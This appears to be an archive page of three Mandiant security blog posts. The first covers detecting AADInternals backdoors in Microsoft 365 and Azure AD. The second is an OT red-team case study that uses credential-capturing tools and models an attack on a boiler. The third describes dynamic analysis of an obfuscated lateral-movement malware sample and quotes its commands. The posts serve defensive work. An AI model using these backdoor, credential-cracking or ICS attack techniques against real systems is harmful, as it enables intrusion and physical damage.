Category Archives: Mandiant

Detecting Microsoft 365 and Azure Active Directory Backdoors

Mandiant has seen an uptick in incidents involving Microsoft 365 (M365) and Azure Active Directory (Azure AD). Most of these incidents are the result of a phishing email coercing a user to enter their credentials used for accessing M365 into a phishing site. Other incidents have been a result of password spraying, password stuffing, or simple brute force attempts against M365 tenants. In almost all of these incidents, the user or account was not protected by multi-factor authentication (MFA).

These opportunistic attacks are certainly the most common form of compromise for M365 and Azure AD, and are usually the initial vector to establish persistence. During both incident response (IR) engagements and proactive cloud assessments we are often asked:

  • What are some other types of attacks that Mandiant is seeing against M365 and Azure AD?
  • Is it possible for an on-premises compromise to “vertically” move to M365 and Azure AD?
  • If a global administrator account is compromised, is it possible to maintain persistence even after the compromised account has been detected, a password reset has occurred, and MFA has been applied?

AADInternals PowerShell Module

In some incidents, Mandiant has witnessed attackers utilizing a PowerShell module called AADInternals, which can allow an attacker to vertically move from on-premises to Azure AD, establish backdoors, steal passwords, generate user security tokens, and bypass MFA protections. This PowerShell module has allowed attackers to maintain persistence in the tenant even after initial eradication efforts were conducted.

To see this module in action and understand how it works, Dr. Nestori Syynimaa’s PSCONFEU 2020 presentation, Abusing Azure Active Directory: Who would you like to be today?, provides an in-depth overview of the module.

To detect the use of AADInternals, it is important to understand how some of these attacks work. Once an understanding is established, abnormal usage can be detected through a combination of log analysis and host-based indicators.

Backdoor 1: Abusing Pass-Through Authentication

Attacker Requirements

  • Local Administrative Access to a server running Pass-through Authentication

Or

  • M365 global administrator credentials

The AADInternals PowerShell module contains a function called Install-AADIntPTASPY. The function works by inserting itself as a man-in-the-middle within the Pass-through Authentication (PTA) process that occurs between Azure AD and the server running the PTA Agent in the on-premises environment. Commonly, the PTA Agent runs on the same on-premises server as Azure AD Connect (AAD Connect).

When PTA is enabled, every logon that occurs against Azure AD gets redirected to the PTA Agent on-premises. The PTA Agent asks an on-premises Active Directory Domain Controller if a password is valid for an authenticating account. If valid, the PTA Agent responds back to Azure AD to grant the requestor access. Figure 1 provides the workflow of Pass-through Authentication and where AADInternals can intercept the request.


Figure 1: Pass-through Authentication workflow

Once the function is running, every PTA attempt against Azure AD will be intercepted by the installed AADIntPTASpy module. The module will record the user’s password attempt and reply back to Azure AD on behalf of the PTA Agent. This reply advises Azure AD the password attempt was valid and grants the user access to the cloud, even if the password is incorrect. If an attacker has implanted AADIntPTASpy, they can log in as any user that attempts to authenticate using PTA—and will be granted access.

Additionally, all password attempts that are registered by the AADIntPTASpy module are recorded within a log file on the server (Default location: C:\PTASpy\PTASPy.csv). Figure 2 shows how the log file can be decoded to reveal a user’s password in cleartext.


Figure 2: PTASpy.csv decoded passwords

Not only will this function allow an attacker to login as any user who authenticates via PTA, but it will also act as a repository for collecting user passwords who are legitimately logging into Azure AD. This could allow an attacker to pivot their attack to other areas of the network—or use these credentials against other internet accessible portals that may leverage single-factor authentication (e.g., VPN gateway).

An attacker can use this module in one of two ways:

Method 1: On-Premises Compromise

An attacker has gained access to an on-premises domain and is able to laterally move to the AADConnect / PTA Agent Server. From this server, an attacker can potentially leverage the AADInternals PowerShell module and invoke the Install-AADIntPTASpy function.

Method 2: Cloud Compromise

If an attacker has successfully compromised an Azure AD global admin account, an attack can be conducted from an attacker’s own infrastructure. An attacker can install a PTA Agent on a server they manage and register the agent using the compromised global administrator account (Figure 3).


Figure 3: Azure AD Portal—registered Pass-through Authentication agents

Once registered with Azure AD, the rogue server will begin to intercept and authorize all login attempts. As with Method 1, this server can also be used to harvest valid credentials.

Backdoor 2: Abusing Identity Federation

Attacker Requirements

  • Local administrative access to AD and server running Active Directory Federation Services

Or

  • M365 global administrator credentials

Another method of authenticating to M365 is through the usage of federation services. When a M365 domain is configured as a federated domain, a trust is configured between M365 and an external identify provider. In many cases, this trust is established with an Active Directory Federation Services (ADFS) server for an on-premises Active Directory domain.

Once a trust is established, when a user logs into M365 using a federated domain, their request is redirected to the external identify provider (ADFS) where their authentication is validated (Figure 4). Once validated, the ADFS server provides the user a security token. This token is then trusted by M365 and grants the access to the platform.


Figure 4: Microsoft 365 Federation Sign-in workflow

AADInternals has a PowerShell function to craft security tokens, which mimics the ADFS authentication process. When providing the function a valid UserPrincipalName, Immutable ID and IssuerURI, an attacker can generate a security token as any user of the tenant. What’s even more concerning is that once this security token is generated, this can allow an attacker to bypass MFA.

As with Backdoor 1, this attack can either be performed from a compromised on-premises environment or from an attacker’s own infrastructure.

Method 1: On-Premises Compromise

Once an attacker has gained access to an on-premises domain with elevated access, they can begin to collect the required information to craft their own security tokens to backdoor into M365 as any user. An attacker will require:

  • A valid UserPrincipalName and Immutable.
    • Both of these attributes can be pulled from the on-premises Active Directory domain.
  • IssuerURI of the ADFS server and ADFS Signing certificate.
    • This can be obtained from an ADFS server when directly logged into the server or remotely querying the server via an privileged account.

Once an attacker has collected the necessary information, using the AADInternals Open-AADIntOffice365Portal command, a security token for the user can be generated granting an attacker access to M365 (Figure 5).


Figure 5: AADInternals Open-AADIntOffice365Portal command

Method 2: Cloud Compromise

If an attacker has a compromised an M365 Global Administrator account, using their own infrastructure, an attacker can use their administrative access to collect user information and reconfigure the tenant to establish their backdoor. In this method, an attacker will require:

  • A valid UserPrincipalName and valid ImmutableId.
    • Figure 6 shows how the Get-MsolUser command can obtain a user’s ImmutableId from Azure AD.


Figure 6: Get-MsolUser—list user UPN & ImmutableId

  • IssuerURI
    • This can be obtained by converting a managed domain to a federated domain. Figures 7 through 10 show how the AADInternals ConvertTo-AADIntBackdoor command (Figure 8) can be used to allow attacker to register their own IssuerURI for a federated domain.


Figure 7: Get-msoldomain—list of registered domains and authentication


Figure 8: ConvertTo-AADIntBackdoor—convert domain to federated authentication


Figure 9: Changed authentication method


Figure 10: Azure AD Portal registered domains

Note: To not interrupt production and authentication with an existing federated domain (and to remain undetected), an attacker may opt to register a new domain with the tenant.


Figure 11: AADInternals Open-AADIntOffice365Portal Command using new Federated domain

Once an attacker has properly configured the tenant, using the ImmutableId of any user, a security token can be generated by executing the Open-AADIntOffice365Portal command (Figure 11). This will allow an attacker to login as that user without the need for a valid certificate or a legitimate IssuerURI.

Fortunately for defenders, this method will generate a number of events in the unified audit log, which can be leveraged for monitoring and alerting.

Mitigation and Detection

Once persistence is established, it can be extremely difficult to detect login activity that is utilizing one of the previously described methods. In lieu of this, it is recommended to monitor and alert on M365 unified audit logs and Azure AD sign-in activity to detect anomalous activity.

Detection in FireEye Helix

Being that Mandiant has seen this methodology being used in the wild, we felt it was necessary to build these detections into our FireEye Helix security platform. Helix engineers have created sever new detection rules that monitor for detectable activity of an attacker making use of the AADInternals PowerShell module.

The following five rules will monitor a server’s event logs and alert upon the installation and usage of the AADInternals PowerShell module (Figure 12). The detection of these activities could be high fidelity alerts that an attacker is preparing to configure backdoors into M365 and Azure AD environments.


Figure 12: AADInternals Helix rules

If an attacker has successfully configured a backdoor using AADInternals, Helix will alert upon the following events registered in the Office 365 unified audit log and Azure Activity Log as indication of a possible event (Figure 13 and Figure 14). It is important to note that these alerts could be triggered upon legitimate administrator activity. When responding to these alerts, first check with your M365 and Azure AD administrator to verify the activity before raising a security event.


Figure 13: Office 365 and Azure Helix rules


Figure 14: PTA Connector Registered alert description

Hunting for Backdoors in M365 Unified Audit Logs and Azure AD Logs

If you suspect a global administrator account was compromised and you want to review Azure AD for indicators of potential abuse, the following should be reviewed (note that these same concepts can be used for proactive log monitoring):

  • From Azure AD Sign-ins logs, monitor logon activity from On-Premises Directory Synchronization Service Accounts. This account is used by the Azure AD Connect service (Figure 15).


Figure 15: Azure AD Sign-ins

  • Baseline the IP addresses used by this account and make sure the IPs match those assigned to the on-premises WAN infrastructure. If the attacker has configure a PTA Agent on their own infrastructure, seeing an IP that does not match your baseline could be an indicator that a rogue PTA Agent has been configured by the attacker (Figure 16).


Figure 16: Azure AD Sign-in logs—On-Premises Directory Synchronization Services account

From Azure AD Sign-ins, monitor and baseline Azure AD Sign-ins to the Azure AD Application Proxy Connector. Make sure to validate username, IP and location.

These events are typically only generated when a new PTA agent is connected to the tenant. This could be an indicator that an attacker has connected a rogue PTA server hosted on an attacker’s infrastructure (Figure 17).


Figure 17: Azure AD Sign-in logs—Azure AD Application Proxy Connector

If using Azure Sentinel, this event will also be registered in the Azure AuditLogs table as a “Register Connector” OperationName (Figure 18).


Figure 18: Register Connector—Azure Sentinel logs

  • In the Azure Management Portal under the Azure AD Connect blade, review all registered servers running PTA Agent. The Authentication Agent and IP should match your infrastructure (Figure 19).
    • Log in to https://portal.azure.com
      • Select Azure AD Connect > Pass-through Authentication


Figure 19: Azure Active Directory Pass-through Authentication agent status

  • Monitor and alert for "Directory Administration Activity" in Office 365 Security & Compliance Center’s unified audit log. When an attacker is able to create a domain federation within a compromised cloud tenant, and link this to attacker-owned infrastructure, this will generate activity in the log (Figure 21).
    • https://Protections.office.com/unifiedauitlog > Audit Log Search
    • Select Directory Administration Activates category to select all activities
    • Create New Alert Policy (Figure 20)


Figure 20: Unified Audit Log > Create new alert policy


Figure 21: Unified Audit Log filtered for domain related events

  • Using Azure Sentinel, more granular Directory Administration Activities can be modified for suspicious activity. This includes additions, deletions and modifications of domains and their authentication settings (Figure 22).
    • Monitoring for OfficeActivity Operations in Azure Sentinel can allow an organization to validate if this is normalized activity or if an attacker is working on setting up a backdoor for PTA or federation.
      • Table: OfficeActivity
        • Operation: Set-AcceptedDomain
        • Operation: Set-MsolDomainFederationSettings
        • Operation: Add-FederatedDomain
        • Operation: New-Accepted Domain
        • Operation: Remove-Accepted Domain
        • Operation: Remove-FederatedDomain


Figure 22: OfficeActivity Operations Azure Sentinel logs

Detection On-Premises

If an attacker is able to compromise on-premises infrastructure and access a server running AD Connect or ADFS services with the intention of leveraging a tool such as AADInternals to expand the scope of their access to include cloud, timely on-premises detection and containment is key. The following methods can be leveraged to ensure optimized visibility and detection for the scope of activities described in this post:

  • Treat ADFS and Azure AD Connect servers as Tier 0 assets.
    • Use a dedicated server for each. Do not install these roles and server in addition to other. All too often we are seeing Azure AD Connect running on a file server. 
  • Ensure PowerShell logging is optimized on AD Connect and ADFS servers
  • Review Microsoft-Windows-PowerShell/Operational logs on ADFS and AADConnect Server Logs.
    • If PowerShell logging is enabled, search for Event ID 4101. This event ID will record the event where AADInternals was installed (Figure 23).


Figure 23: EventID 410—Installed Module

  • Additionally, with this logging enabled, you will be able to review the PowerShell commands used by an attacker.
    • In PowerShell, run Get-Module -All and look for the presence of AADInternals (Figure 24).


Figure 24: Get-Module command to list installed modules

  • Alert for the presence of C:\PTASpy and C:\PTASpy\PTASpy.csv.
    • This is the default location of the log file that contains records of all the accounts that were intercepted by the tool. Remember, an attacker may also use this to harvest credentials, so it is important to reset the password for these accounts (Figure 25).


Figure 25: PTASpy.csv log activity

Mitigations

In order for this attack to be successful, an attacker must gain administrative privileges on a server running Azure AD Connect and/or gain global administrator rights within M365. Simple practices such as limiting and properly protecting global administrator accounts as well as properly protecting Tier 0 assets can greatly reduce the risk of an attacker successfully using the AADInternals PowerShell against your organization.

  • Limit or restrict access to Azure AD Connect servers.
    • Any server acting as an identity provider or facilitating identity federation should be treated as a Tier 0 asset.
  • Create separate dedicated global administrator accounts.
    • Global administrators should be cloud-only accounts.
    • These accounts should not retain any licensing.
  • Implement MFA on all accounts: admins, users and services.
    • If a particular account cannot use MFA, apply a conditional access rule that limits its logon to a trusted network. This works particularly well for service accounts.  
  • Establish a roadmap to block legacy authentication.
  • Limit which accounts are synced from on-premises to the cloud.
    • Do not sync privileged or service accounts to the cloud.
  • Use Azure administrative roles.
    • Not everybody or everything needs to be a global admin to administer the environment.
  • Use password hash sync over Pass-through Authentication.
    • Many organizations are reluctant to sync their password to Azure AD. The benefits from this service greatly outweigh the risks. Being able to use global and custom banned passwords lists, for both the cloud and on-premises, is a tremendous benefit.
  • Forward all M365 unified audit logs and Azure logs to a SIEM and build detections.
    • Ensure you are forwarding the logs recommended in this post and building the appropriate detections and playbooks within your security operations teams.
    • Specifically monitor for:
      • Set-AcceptedDomain
      • Set-MsolDomainFederationSettings
      • Add-FederatedDomain
      • New-Accepted Domain
      • Remove-Accepted Domain
      • Remove-FederatedDomain
  • Periodically review all identity providers and custom domains configured in the M365 tenant.
    • If an attacker is successful at gaining global administrative privileges, they may choose to add their own identity provider and custom domain to maintain persistence.

Acknowledgements

I want to give a special thanks to Daniel Taylor, Roberto Bamberger and Jennifer Kendall at Microsoft for collaborating with Mandiant on the creation of this blog post.

A Hands-On Introduction to Mandiant’s Approach to OT Red Teaming

Operational technology (OT) asset owners have historically considered red teaming of OT and industrial control system (ICS) networks to be too risky due to the potential for disruptions or adverse impact to production systems. While this mindset has remained largely unchanged for years, Mandiant's experience in the field suggests that these perspectives are changing; we are increasingly delivering value to customers by safely red teaming their OT production networks.

This increasing willingness to red team OT is likely driven by a couple of factors, including the growing number and visibility of threats to OT systems, the increasing adoption of IT hardware and software into OT networks, and the maturing of OT security teams. In this context, we deemed it relevant to share some details on Mandiant's approach to red teaming in OT based on years of experience supporting customers learning about tangible threats in their production environments.

In this post we introduce Mandiant's approach to OT red teaming and walk through a case study. During that engagement, it took Mandiant only six hours to gain administrative control on the target's OLE for Process Control (OPC) servers and clients in the target's Distributed Control System (DCS) environment. We then used this access to collect information and develop an attack scenario simulating the path a threat actor could take to prepare for and attack the physical process (We highlight that the red team did not rely on weaknesses of the DCS, but instead weak password implementations in the target environment).

NOTE: Red teaming in OT production systems requires planning, preparation and "across the aisle" collaboration. The red team must have deep knowledge of industrial process control and the equipment, software, and systems used to achieve it. The red team and the asset owner must establish acceptable thresholds before performing any activities.

Visit our website for more information or to request Mandiant services or threat intelligence.

Mandiant's Approach for Safe Red Teaming in OT

Mandiant's approach to red teaming OT production systems consists of two phases: active testing on IT and/or OT intermediary systems, and custom attack modeling to develop one or more realistic attack scenarios. Our approach is designed to mirror the OT-targeted attack lifecycle—with active testing during initial stages (Initial Compromise, Establish Foothold, Escalate Privileges, and Internal Reconnaissance), and a combination of active/passive data collection and custom threat modeling to design feasible paths an attacker would follow to complete the mission.


Figure 1: Mandiant OT red teaming approach

  • Mandiant's OT red teaming may begin either from the perspective of an external attacker leveraging IT compromises to pivot into the OT network, or from the perspective of an actor who has already gained access into the OT network and is ready to escalate the intrusion.
  • We then leverage a range of commodity tools and utilities that are widely available in most target environments to pivot across OT intermediary systems and gain privileged access to target ICS.
  • Throughout this process, we maintain constant communication with the customer to establish safety thresholds. Active participation from the defenders will also enable the organization to learn about the techniques we use to extract information and the weaknesses we exploit to move across the target network.
  • Once the active testing stops at the agreed safety threshold, we compile this information and perform additional research on the system and processes to develop realistic and target-specific attack scenarios based on our expertise of threat actor behaviors.

Mandiant's OT red teaming can be scoped in different ways depending on the target environment, the organization's goals, and the asset owner's cyber security program maturity. For example, some organizations may test the full network architecture, while others prefer to sample only an attack on a single system or process. This type of sampling is useful for organizations that own a large number of processes and are unlikely to test them one by one, but instead they can learn from a single-use case that reflects target-specific weaknesses and vulnerabilities. Depending on the scope, the red teaming results can be tailored to:

  • Model attack scenarios based on target-specific vulnerabilities and determine the scope and consequences if a threat actor were to exploit them in their environment.
  • Model attack paths across the early stages of reconnaissance and lateral movement to identify low-hanging fruit that adversaries may exploit to enable further compromise of OT.
  • Operationalize threat intelligence to model scenarios based on tactics, techniques, and procedures (TTPs) from known actors, such as advanced persistent threats (APTs).
  • Test specific processes or systems deemed at high risk of causing a disruption to safety or operations. This analysis highlights gaps or weaknesses to determine methods needed to secure high-risk system(s).

Red Teaming in OT Provides Unique Value to Defenders

Red teaming in OT can be uniquely helpful for defenders, as it generates value in a way very specific to an organizations' needs, while decreasing the gap between the "no holds barred" world of real attackers and the "safety first" responsibility of the red team. While it is common for traditional red teaming engagements to end shortly after the attacker pivots into a production OT segment, a hybrid approach, such as the one we use, makes it possible for defenders to gain visibility into the specific strengths and weaknesses of their OT networks and security implementations. Here are some other benefits of red teaming in OT production networks:

  • It helps defenders understand and foresee possible paths that sophisticated actors may follow to reach specific goals. While cyber threat intelligence is another great way to build this knowledge, red teaming allows for additional acquisition of site-specific data.
  • It responds to the needs of defenders to account for varying technologies and architectures present in OT networks across different industries and processes. As a result, it accounts for outliers that are often not covered by general security best practices guidance.
  • It results in tangible and realistic outputs based on our active testing showing what can really happen in the target network. Mandiant's OT red teaming results often show that common security testing tools are sufficient for actors to reach critical process networks.
  • It results in conceptual attack scenarios based on real attacker behaviors and specific knowledge about the target. While the scenarios may sometimes highlight weaknesses or vulnerabilities that cannot be patched, these provide defenders with the knowledge needed to define alternative mitigations to mitigate risks earlier in the lifecycle.
  • It can help to identify real weaknesses that could be exploited by an actor at different stages of the attack lifecycle. With this knowledge, defenders can define ways to stop threat activity before it reaches critical production systems, or at least during early phases of the intrusion.

Applying Our Approach in the Real World: Big Steam Works

During this engagement, we were tasked with gaining access to critical control systems and designing a destructive attack in an environment where industrial steaming boilers are operated with an Distributed Control System (DCS). In this description, we redacted customer information—including the name, which we refer to as "Big Steam Works"—and altered sensitive details. However, the overall attack techniques remain unchanged. The main objective of Big Steam Works is to deliver steam to a nearby chemical production company.

For the scope of this red team, the customer wanted to focus entirely on its OT production network. We did not perform any tests in IT networks and instead begun the engagement with initial access granted in the form of a static IP address in Big Steam Work's OT network. The goal of the engagement was to deliver consequence-driven analysis exploring a scenario that could cause a significant physical impact to both safety and operations. Following our red teaming approach, the engagement was divided in two phases: active testing across IT and/or OT intermediary systems, and custom attack modeling to foresee paths an attacker may follow to complete its mission.

We note that during the active testing phase we were very careful to maintain high safety standards. This required not only highly skilled personnel with knowledge about both IT and OT, but also constant engagement with the customer. Members from Big Steam Works helped us to set safety thresholds to stop and evaluate results before moving forward, and actively monitored the test to observe, learn, and remain vigilant for any unintended changes in the process.

Phase 1 – Active Testing

During this phase, we leveraged publicly accessible offensive security tools (including Wireshark, Responder, Hashcat, and CrackMapExec) to collect information, escalate privileges, and move across the OT network. In close to six hours, we achieved administrative control on several Big Steam Works' OLE for Process Control (OPC) servers and clients in their DCS environment. We highlight that the test did not rely on weaknesses of the DCS, but instead weak password implementations in the target environment. Figure 2 details our attack path:


Figure 2: Active testing in Big Steam Work's OT network

  1. We collected network traffic using Wireshark to map network communications and identify protocols we could use for credential harvesting, lateral movement, and privilege escalation. Passive analysis of the capture showed Dynamic Host Configuration Protocol (DHCP) broadcasts for IPv6 addresses, Link-Local Multicast Name Resolution (LLMNR) protocol traffic, and NetBios Name Service (NBT-NS) traffic.
  2. We responded to broadcast LLMNR, NBT-NS, and WPAD name resolution requests from devices using a publicly available tool called Responder. As we supplied our IP address in response to broadcasted name resolution requests from other clients on the subnet, we performed man-in-the-middle (MiTM) attacks and obtained NTLMv1/2 authentication protocol password hashes from devices on the network.
  3. We then used Hashcat to crack the hashed credentials and use them for further lateral movement and compromise. The credentials we obtained included, but were not limited to, service accounts with local administrator rights on OPC servers and clients. We note that Hashcat cracked the captured credentials in only six seconds due to the lack of password strength and complexity.
  4. With the credentials captured in the first three steps, we accessed other hosts on the network using CrackMapExec. We dumped additional cached usernames, passwords, and password hashes belonging to both local and domain accounts from these hosts.
  5. This resulted in privileged access and control over the DCS's OPC clients and servers in the network. While we did not continue to execute any further attack, the level of access gained at this point enabled us to perform further reconnaissance and data collection to design and conceptualize the last steps of a targeted attack on the industrial steaming boilers.

The TTPs we used during the active testing phase resemble some of the simplest resources that can be used by threat actors during real OT intrusions. The case results are concerning given that they illustrate only a few of the most common weaknesses we often observe across Mandiant OT red team engagements. We highlight that all the tools used for this intrusion are known and publicly available. An attacker with access to Big Steam Works could have used these methods as they represent low-hanging fruit and can often be prevented with simple security mitigations.

Phase 2 – Custom Attack Modeling

For roughly a week, Mandiant gathered additional information from client documentation and research on industrial steaming boilers. We then mirrored the process an attacker would follow to design a destructive attack on the target process given the results achieved during phase 1. At this point of the intrusion, the attacker would have already obtained complete control over Big Steam Works' OPC clients and servers, gaining visibility and access to the DCS environment.

Before defining the path to follow, the attacker would likely have to perform further reconnaissance (e.g., compromising additional systems, data, and credentials within the Big Steam Works DCS environment). Specifically, the attacker could:

  • Gain access to the DCS configuration software/engineering workstation
  • Obtain configuration/control logic files
  • Determine the type/function of the different DCS nodes in the environment
  • Use native DCS tools for system overview, graphics display, and point drill down
  • Identify alarms/alerts monitored by operators via remote HMI screens and map them to defined points
  • Map the flow of the physical process based on data collection and review

Our next step was to develop the custom scenario. For this example, we were tasked with modeling a case where the attacker was attempting to create a condition that had a high likelihood of causing physical damage and disruption of operations (see Figure 3). In this scenario, the attacker attempted to achieve this by lowering the water level in a boiler drum below the safe threshold while not tripping the burner management system or other safety mechanisms. If successful, this would result in rapid and extreme overheating in the boiler. Opening the feedwater valve under such conditions could result in a catastrophic explosion.


Figure 3: Custom attack model diagram for Big Steam Works

Figure 3 describes how a real attacker might pursue their mission after gaining access to the OPC servers and clients. As the actor moves closer to their goals, it becomes more difficult to assess both the probability of success and the actual impact of their actions due to nuances specific to the client environment and additional safety and security controls built into the process. However, the analysis holds significant value as it illustrates the overall structure of the physical process and potential attacker behaviors aimed at achieving specific end goals. Furthermore, it proceeds directly from the results obtained during the first phase of the red teaming.

The model presents one feasible combination of actions that an attacker could perform to access devices governing the boiler drum and modify the water level while remaining undetected. With the level of access obtained from phase 1, the attacker would likely be able to compromise engineering workstations (EWS) for the boiler drum's controller using similar tools. This would likely enable the actor to perform actions such as changing the drum level setpoints, modifying the flow of steam scaling, or modifying water flow scaling. While the model does not reflect all additional safety and security measures that may be present deeper in the process, it does account for the attacker's need to modify alarms and control sensor outputs to remain undetected.

By connecting the outcomes produced in the test to the potential physical impacts and motivations involved in a real attack, this model provided Big Steam Works with a realistic overview of cyber security threats to a specific physical process. Further collaboration with the customer enabled us to validate the findings and support the organization to mitigate the risks reflected in the model.

Outlook

Mandiant's OT red teaming supports organizations by combining both the hands-on analysis of vulnerabilities and weaknesses in IT and OT networks with the conceptual modeling of attacker goals and possible avenues to reach specific outcomes. It also enables security practitioners to adopt the attacker's perspective and explore attack vectors that may otherwise have not been conceived regardless of their value as low-hanging fruit for OT intrusions.

Our approach presents realistic scenarios based upon technical evidence of intrusion activity upon OT intermediary systems in the tested network. In this way, it is tailored to support consequence-driven analysis of threats to specific critical systems and processes. This enables organizations to identify attack scenarios involving digital assets and determine safeguards that can best help to protect the process and ensure the safety of their facilities.

Head over to our website for more information or to request Mandiant services or threat intelligence.

Configuring a Windows Domain to Dynamically Analyze an Obfuscated Lateral Movement Tool

We recently encountered a large obfuscated malware sample that offered several interesting analysis challenges. It used virtualization that prevented us from producing a fully-deobfuscated memory dump for static analysis. Statically analyzing a large virtualized sample can take anywhere from several days to several weeks. Bypassing this time-consuming step presented an opportunity for collaboration between the FLARE reverse engineering team and the Mandiant consulting team which ultimately saved many hours of difficult reverse engineering.

We suspected the sample to be a lateral movement tool, so we needed an appropriate environment for dynamic analysis. Configuring the environment proved to be essential, and we want to empower other analysts who encounter samples that leverage a domain. Here we will explain the process of setting up a virtualized Windows domain to run the malware, as well as the analysis techniques we used to confirm some of the malware functionality.

Preliminary Analysis

When analyzing a new malware sample, we begin with basic static analysis, where we can often get an idea of what type of sample it is and what it’s capabilities might be. We can use this to inform the subsequent stages of the analysis process and focus on the relevant data. We begin with a Portable Executable analysis tool such as CFF Explorer. In this case, we found that the sample is quite large at 6.64 MB. This usually indicates that the sample includes statically linked libraries such as Boost or OpenSSL, which can make analysis difficult.

Additionally, we noticed that the import table includes eight dynamically linked DLLs with only one imported function each as shown in Figure 1. This is a common technique used by packers and obfuscators to import DLLs that can later be used for runtime linking, without exposing the actual APIs used by the malware.


Figure 1: Suspicious imports

Our strings analysis confirmed our suspicion that the malware would be difficult to analyze statically. Because the file is so large, there were over 75,000 strings to consider. We used StringSifter to rank the strings according to relevance to malware analysis, but we did not identify anything useful. Figure 2 shows the most relevant strings according to StringSifter.


Figure 2: StringSifter output

When we encounter these types of obstacles, we can often turn to dynamic analysis to reveal the malware's behavior. In this case, our basic dynamic analysis provided hope. Upon execution the sample printed a usage statement:

Usage: evil.exe [/P:str] [/S[:str]] [/B:str] [/F:str] [/C] [/L:str] [/H:str] [/T:int] [/E:int] [/R]
   /P:str -- path to payload file.
   /S[:str] -- share for reverse copy.
   /B:str -- path to file to load settings from.
   /F:str -- write log to specified file.
   /C -- write log to console.
   /L:str -- path to file with host list.
   /H:str -- host name to process.
   /T:int -- maximum number of concurrent threads.
   /E:int -- number of seconds to delay before payload deletion (set to 0 to avoid remove).
   /R -- remove payload from hosts (/P and /S will be ignored).
If /S specifed without value, random name will be used.
/L and /H can be combined and specified more than once. At least one must present.
/B will be processed after all other flags and will override any specified values (if any).
All parameters are case sensetive.

Figure 3: Usage statement

We attempted to unpack the sample by suspending the process and dumping the memory. This proved difficult as the malware exited almost instantly and deleted itself. We eventually managed to produce a partially-unpacked memory dump by using the commands in Figure 4.

sleep 2 && evil.exe /P:"C:\Windows\System32\calc.exe" /E:1000 /F:log.txt /H:some_host

Figure 4: Commands executed to run binary

We chose an arbitrary payload file and a large interval for payload deletion. We also provided a log filename and a hostname for payload execution. These parameters were designed to force a slower execution time so we could suspend the process before it terminated.

We used Process Dump to produce a memory snapshot after the two second delay. Unfortunately, virtualization still hindered static analysis and our sample remained mostly obfuscated, but we did manage to extract some strings which provided the breakthrough we needed.

Figure 5 shows some of the interesting strings we encountered that were not present in the original binary.

dumpedswaqp.exe
psxexesvc
schtasks.exe /create /tn "%s" /tr "%s" /s "%s" /sc onstart /ru system /f
schtasks.exe /run /tn "%s" /s "%s"
schtasks.exe /delete /tn "%s" /s "%s" /f
ServicesActive
Payload direct-copied
Payload reverse-copied
Payload removed
Task created
Task executed
Task deleted
SM opened
Service created
Service started
Service stopped
Service removed
Total hosts: %d, Threads: %d
SHARE_%c%c%c%c
Share "%s" created, path "%s"
Share "%s" removed
Error at hooking API "%S"
Dumping first %d bytes:
DllRegisterServer
DllInstall
register
install

Figure 5: Strings output from memory dump

Based on the analysis thus far, we suspected remote system access. However, we were unable to confirm our suspicions without providing an environment for lateral movement. To expedite analysis, we created a virtualized Windows domain.

This requires some configuration, so we have documented the process here to aid others when using this analysis technique.

Building a Test Environment

In the test environment, make sure to have clean Windows 10 and Windows Server 2016 (Desktop Experience) virtual machines installed. We recommend creating two Windows Server 2016 machines so the Domain Controller can be separated from the other test systems.

In VMware Virtual Network Editor on the host system, create a custom network with the following settings:

  • Under VMNet Information, select the “Host-only” radio button.
  • Ensure that “Connect a host virtual adapter” is disabled to prevent connection to the outside world.
  • Ensure that the “Use local DHCP service” option is disabled if static IP addresses will be used.

This is demonstrated in Figure 6.


Figure 6: Virtual network adapter configuration

Then, configure the guests’ network adapters to connect to this network.

  • Configure hostnames and static IP addresses for the virtual machines.
  • Choose the domain controller IP as the default gateway and DNS server for all guests. 

We used the system configurations shown in Figure 7.


Figure 7: Example system configurations

Once everything is configured, begin by installing Active Directory Domain Services and DNS Server roles onto the designated domain controller server. This can be done by selecting the options shown in Figure 8 via the Windows Server Manager application. The default settings can be used throughout the dialog as roles are added.


Figure 8: Roles needed on domain controller

Once the roles are installed, run the promotion operation as demonstrated in Figure 9. The promotion option is accessible through the notifications menu (flag icon) once the Active Directory Domain Services role is added to the server. Add a new forest with a fully qualified root domain name such as testdomain.local. Other options may be left as default. Once the promotion process is complete, reboot the system.


Figure 9: Promoting system to domain controller in Server Manager

Once the domain controller is promoted, create a test user account via Active Directory Users and Computers on the domain controller. An example is shown in Figure 10.


Figure 10: Test user account

Once the test account is created, proceed to join the other systems on the virtual network to the domain. This can be done through Advanced System Settings as shown in Figure 11. Use the test account credentials to join the system to the domain.


Figure 11: Configure the domain name for each guest

Once all systems are joined to the domain, verify that each system can ping the other systems. We recommend disabling the Windows Firewall in the test environment to ensure that each system can access all available services of another system in the test environment.

Give the test account administrative rights on all test systems. This can be done by modifying the local administrator group on each system manually with the command shown in Figure 12 or automated through a Group Policy Object (GPO).

net localgroup administrators sa_jdoe /ADD

Figure 12: Command to add user to local administrators group

Dynamic Analysis on the Domain

At this point, we were ready to begin our dynamic analysis. We prepared our test environment by installing and launching Wireshark and Process Monitor. We took snapshots of all three guests and ran the malware in the context of the test domain account on the client as shown in Figure 13.

evil.exe /P:"C:\Windows\System32\calc.exe" /L:hostnames.txt /F:log.txt /S /C

Figure 13: Command used to run the malware

We populated the hostnames.txt file with the following line-delimited hostnames as demonstrated in Figure 14.

DBPROD.testdomain.local
client.testdomain.local
DC.testdomain.local

Figure 14: File contents of hostnames.txt

Packet Capture Analysis

Upon analyzing the traffic in the packet capture, we identified SMB connections to each system in the host list. Before the SMB handshake completed, Kerberos tickets were requested. A ticket granting ticket (TGT) was requested for the user, and service tickets were requested for each server as seen in Figure 15. To learn more about the Kerberos authentication protocol, please see our recent blog post that introduces the protocol along with a new Mandiant Red Team tool.


Figure 15: Kerberos authentication process

The malware accessed the C$ share over SMB and wrote the file C:\Windows\swaqp.exe. It then used RPC to launch SVCCTL, which is used to register and launch services. SVCCTL created the swaqpd service. The service was used to execute the payload and then was subsequently deleted. Finally, the file was deleted, and no additional activity was observed. The traffic is shown in Figure 16.


Figure 16: Malware behavior observed in packet capture

Our analysis of the malware behavior with Process Monitor confirmed this observation. We then proceeded to run the malware with different command line options and environments. Combined with our static analysis, we were able to determine with confidence the malware capabilities, which include copying a payload to a remote host, installing and running a service, and deleting the evidence afterward.

Conclusion

